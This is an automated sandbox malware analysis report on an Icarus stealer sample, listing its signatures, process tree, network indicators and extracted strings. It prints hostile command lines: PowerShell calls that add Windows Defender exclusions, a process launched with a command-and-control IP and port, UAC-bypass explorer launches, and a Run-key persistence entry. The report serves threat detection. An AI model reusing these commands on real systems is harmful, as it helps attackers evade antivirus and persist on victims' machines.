
Windows Analysis Report
licarisan_api.exe

Overview

General Information

Sample name: licarisan_api.exe
Analysis ID: 1526431
MD5: 65a683124fc4ca1839e95322370e2b0d
SHA1: 7a7eafcfa4349e40cb15ab30b5c64d3415e60b96
SHA256: 3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f
Tags: exe, user-aachum

Detection

Icarus
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Icarus stealer
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code contains suspicious base64 encoded strings
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Sigma detected: Explorer NOUACCHECK Flag
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • licarisan_api.exe (PID: 3632 cmdline: "C:\Users\user\Desktop\licarisan_api.exe" MD5: 65A683124FC4CA1839E95322370E2B0D)
    • csc.exe (PID: 7584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • explorer.exe (PID: 7624 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
      • cvtres.exe (PID: 7640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7884 cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8000 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 5660 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 7936 cmdline: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8016 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • explorer.exe (PID: 7648 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 7800 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
Name: Icarus
Description: Icarus is a modular stealer software, written in .NET. One module is the open source r77 rootkit.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.icarus
{"C2 url": "193.142.146.64:8880", "Identifier": "ICARUS_Client"}
Source | Rule | Description | Author
0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Icarus | Yara detected Icarus stealer | Joe Security
0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Icarus | Yara detected Icarus stealer | Joe Security
Process Memory Space: csc.exe PID: 7584 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: csc.exe PID: 7584 | JoeSecurity_Icarus | Yara detected Icarus stealer | Joe Security
Process Memory Space: cvtres.exe PID: 7640 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Source | Rule | Description | Author
12.2.cvtres.exe.400000.0.unpack | JoeSecurity_Icarus | Yara detected Icarus stealer | Joe Security
10.2.csc.exe.852cc18.1.unpack | JoeSecurity_Icarus | Yara detected Icarus stealer | Joe Security
10.2.csc.exe.852cc18.1.raw.unpack | JoeSecurity_Icarus | Yara detected Icarus stealer | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\explorer.exe /NoUACCheck, CommandLine: C:\Windows\explorer.exe /NoUACCheck, CommandLine|base64offset|contains: y, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Windows\explorer.exe /NoUACCheck, ProcessId: 7648, ProcessName: explorer.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ParentProcessId: 7640, ParentProcessName: cvtres.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, ProcessId: 7884, ProcessName: cmd.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\Music\OcoulsUpdater\EyesUpdater.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\licarisan_api.exe, ProcessId: 3632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OcuulusUpdater
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7884, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ProcessId: 8000, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-05T16:46:40.239620+0200 | 2037836 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49803 | 193.142.146.64 | 8880 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-05T16:46:45.158427+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.7 | 49833 | 34.117.59.81 | 80 | TCP

AV Detection

Source: cvtres.exe.7640.12.memstrmin | Malware Configuration Extractor: Icarus {"C2 url": "193.142.146.64:8880", "Identifier": "ICARUS_Client"}
Source: licarisan_api.exe | ReversingLabs: Detection: 21%
Source: licarisan_api.exe | Virustotal: Detection: 33%
Source: Yara match | File source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: licarisan_api.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdb | source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: H:\HVNC VELOCITY\Velocity (2)\Velocity\HVNC Source\NewDLL\DLL\obj\Release\DLL.pdbJ | source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2037836 - Severity 1 - ET MALWARE Win32/Sabsik.TE.B!ml CnC Checkin : 192.168.2.7:49803 -> 193.142.146.64:8880
Source: Malware configuration extractor | URLs: 193.142.146.64:8880
Source: global traffic | TCP traffic: 192.168.2.7:49803 -> 193.142.146.64:8880
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1, Host: ipinfo.io, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1, Host: ipinfo.io
Source: Joe Sandbox View | IP Address: 34.117.59.81
Source: Joe Sandbox View | ASN Name: HOSTSLICK-GERMANYNL
Source: unknown | DNS query: name: ipinfo.io
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49833 -> 34.117.59.81:80
                  Source: unknown | TCP traffic detected without corresponding DNS query: 193.142.146.64 (repeated 50 times)
                  Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1  Host: ipinfo.io  Connection: Keep-Alive (repeated 28 times)
                  Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1  Host: ipinfo.io (repeated 11 times)
                  Source: global traffic | DNS traffic detected: DNS query: ipinfo.io
                  Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://ascstats.iobit.com/usage.phpU
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: EyesUpdater.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io
                  Source: csc.exe, 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io/ip
                  Source: cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003103000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000304C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003010000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.io/ipd
                  Source: cvtres.exe, 0000000C.00000002.2507488327.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003004000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000307E000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003152000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003072000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003090000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000314A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030EA000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003040000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003143000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000309C000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030BB000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000308A000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.0000000003034000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, cvtres.exe, 0000000C.00000002.2507488327.000000000303A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipinfo.iod
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://piriform.com/go/app_cc_license_agreement
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://piriform.com/go/app_cc_privacy_policy
                  Source: cvtres.exe, 0000000C.00000002.2507488327.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://www.digicert.com/CPS0
                  Source: licarisan_api.exe, EyesUpdater.exe.0.dr | String found in binary or memory: http://www.piriform.com/ccleaner
                  Source: cvtres.exe, 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://i.ibb.co/RvwvG2z/icaruwsdr-athens.png

                  E-Banking Fraud

                  Source: Yara match | File source: 12.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.csc.exe.852cc18.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 10.2.csc.exe.852cc18.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: csc.exe PID: 7584, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: cvtres.exe PID: 7640, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Code function: 10_2_05824800 CreateDesktopA

                  System Summary

                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, GLBIU47KBU1H.cs | Base64 encoded string: System.Security.
                  Source: 0.2.licarisan_api.exe.724afa.0.raw.unpack, YGRKZZ70EYH6.cs | Long String: Length: 223008
                  Source: C:\Users\user\Desktop\licarisan_api.exe | File dump: EyesUpdater.exe.0.dr 976635604
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042E946 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042FF22 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042EC16 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0043016F NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042E107 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042E524 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042E128 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004301D6 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042E183 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042F6C1 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042FAD8 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042F6B2 NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042EBBD NtQueryDefaultLocale
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_00420086
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_00435E80
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0043702B
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004358F4
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_00435973
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_00435118
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004355C4
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004255AF
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_00435A55
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042F6C1
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004356A8
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004306B3
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_0042EF71
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004353C6
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_004253D9
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A6C25
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A5124
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A7066
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A742C
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A8414
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007AA8AF
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007AA901
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007AA5C7
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A565E
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A960E
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A86DB
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007AA6D8
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007AA6C0
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007AA681
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007A7B2D
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B2413
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B5474
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B4843
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B48A5
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B45C6
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B467C
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B4677
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B4631
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B46C4
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B468A
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007B4BD5
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007EF736
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F285D
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F4053
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007CD42B
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007CD174
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007DBDF4
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007C8DF0
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007F29EE
                  Source: C:\Users\user\Desktop\licarisan_api.exe | Code function: 0_2_007DC9CB
